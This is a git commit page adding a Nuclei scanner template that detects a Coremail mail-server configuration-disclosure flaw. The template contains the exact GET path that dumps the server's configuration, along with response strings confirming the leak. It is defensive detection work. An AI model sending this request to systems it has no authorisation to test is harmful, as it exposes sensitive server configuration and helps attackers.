Merge pull request #1216 from projectdiscovery/princechaddha-patch-4

Create coremail-config-disclosure.yaml
patch-1
PD-Team 2021-04-08 22:25:03 +05:30 committed by GitHub
commit 00a5fae317
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: coremail-config-disclosure
info:
name: Coremail Config Disclosure
author: princechaddha
severity: high
reference: https://www.secpulse.com/archives/107611.html
tags: config,exposure
requests:
- method: GET
path:
- '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'
matchers-condition: and
matchers:
- type: word
words:
- "<object name=\"cm_md_db\">"
- 'containerDefinitions'
- '<string name="User">coremail</string>'
- '<string name="EnableCoremailSmtp">'
condition: or
- type: status
status:
- 200